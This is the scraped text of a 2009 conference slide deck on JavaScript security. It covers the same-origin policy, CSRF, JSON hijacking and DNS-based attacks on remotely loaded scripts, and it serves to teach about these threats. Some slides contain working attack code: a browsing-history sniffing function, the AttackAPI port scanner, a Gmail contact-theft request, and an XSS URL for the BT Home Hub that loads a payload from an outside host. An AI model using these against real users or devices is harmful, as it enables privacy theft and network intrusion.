Java Script Security John Graham-Cumming Living in

Скачать презентацию Java Script Security John Graham-Cumming Living in

e072465de13378577c98294b5d8e9587.ppt

Количество слайдов: 41

Java. Script Security John Graham-Cumming

Living in a powder keg and giving off sparks • • • Java. Script security is a mess The security model is outdated Key examples Attacking DNS to attack Java. Script What are we going to do? Page 2 September 25, 2009

The Java. Script Sandbox • Java. Script security dates to 1995 • Two key concerns: • Stop a malicious web site from attacking your computer • Stop a malicious web site from interacting with another web site Page 3 September 25, 2009

The Death of the PC • If all your documents are in the cloud, what good is protecting your PC? • The Java. Script sandbox does nothing to prevent cloud attacks • Who cares if a web site is prevented from reading your “My Documents”: it’s empty Page 4 September 25, 2009

The Same Origin Policy • Scripts running on one page can’t interact with other pages • For example, scripts loaded by jgc. org can’t access virusbtn. com • But the Same Origin Policy doesn’t apply to the scripts themselves Page 5 September 25, 2009

<SCRIPT> • Inline <SCRIPT> … do stuff … </SCRIPT> • Remote <SCRIPT SRC=“http: //jgc. • Remote Page 6 September 25, 2009

Multiple <SCRIPT> elements • Scripts get equal access to each other and the page Multiple Page 17 September 25, 2009

Script Escalation • Scripts can load other scripts • Get a foothold and you can do anything document. get. Element. By. Id('external_ script'). src = ’http: //othersite. com/x. js’ Page 18 September 25, 2009

Cross-Site Request Forgery • Hijack cookies to use a session for bad purposes • Enhance with Java. Script for complex transactions. Page 19 September 25, 2009

CSRF Example: Google Mail • Steal authenticated user’s contact http: //docs. google. com/data/contacts ? out=js&show=ALL&psort=Affinity&c allback=google&max=99999 google ({ Success: true, Errors: [], Body: {… Page 20 September 25, 2009

function google(data){ var emails, i; for" src="https://present5.com/presentation/e072465de13378577c98294b5d8e9587/image-21.jpg" alt="CSRF Example: Google Mail • Full exploit Page 21 September 25, 2009

JSON Hijacking • CSRF attack against JSON objects • Works by redefined the Object constructor in Java. Script Page 23 September 25, 2009

Stealing history with Java. Script and CSS • Use Java. Script to look at the ‘visited’ color of links function steal. History() { for (var i = 0; i < websites. length; i++) { var link = document. create. Element("a"); link. id = "id" + i; link. href = websites[i]; link. inner. HTML = websites[i]; document. body. append. Child(link); var color = document. default. View. get. Computed. Style(link, null). get. Prope rty. Value("color"); document. body. remove. Child(link); if (color == "rgb(0, 0, 255)") { document. write('' + websites[i] + ''); }}} Page 24 September 25, 2009

Sandbox Holes • Sandbox not immune to actual security holes • Most recent was Google V 8 Java. Script engine Google Chrome V 8 Java. Script Engine Remote Code Execution Vulnerability Bugtraq: 36149 Page 25 September 25, 2009

No Turing Test in Java. Script • No way to distinguish between actual click by user and Java. Script click • Can’t tell whether a user initiated an action or not Page 26 September 25, 2009

Attacking your home firewall • XSS attack on BT Home Hub to use UPn. P to open a port http: //192. 168. 1. 254/cgi/b/ic/connect/? url=%22%3 e%3 cscript%20 src='http: //ww w. gnucitizen. org/blog/bt-home-flubpwnin-the-bt-home-hub 5/payload. xss'%3 e%3 c/script%3 e%3 ca% 20 b= Page 27 September 25, 2009

Port scanning in Java. Script • Port scan using images var Attack. API = { version: '0. 1', author: 'Petkov (architect)', homepage: 'http: //www. gnucitizen. org'}; Attack. API. Port. Scanner = {}; Attack. API. Port. Scanner. scan. Port = function (callback, target, port, timeout) { var timeout = (timeout == null)? 100: timeout; var img = new Image(); img. onerror = function () { if (!img) return; img = undefined; callback(target, port, 'open'); }; img. onload = img. onerror; img. src = 'http: //' + target + ': ' + port; set. Timeout(function () { if (!img) return; img = undefined; callback(target, port, 'closed'); }, timeout); }; Attack. API. Port. Scanner. scan. Target = function (callback, target, ports, timeout){ for (index = 0; index < ports. length; index++) Attack. API. Port. Scanner. scan. Port(callback, target, ports[index], timeout); }; Page 28 September 25, 2009

DNS Attacks • Attacks on DNS are real (Kaminsky et al. ) • If you can alter the DNS of one remote Java. Script you can take over the page • For example, google-analytics. com is on 47% of the top 1, 000 web sites. • 69% of the top 1, 000 load a web analytics solution remotely • 97% load something remotely Page 29 September 25, 2009

Attacking Tech. Crunch Page 30 September 25, 2009

Tech. Crunch and Java. Script • 18 remotely loaded Java. Scripts • mediaplex. com, scorecardresearch. com, quantserve. com, ixnp. com, doubleclick. net, googlesyndication. com, crunchboard. com, snap. com, tweetmeme. com, googleanalytics. com • Additional embedded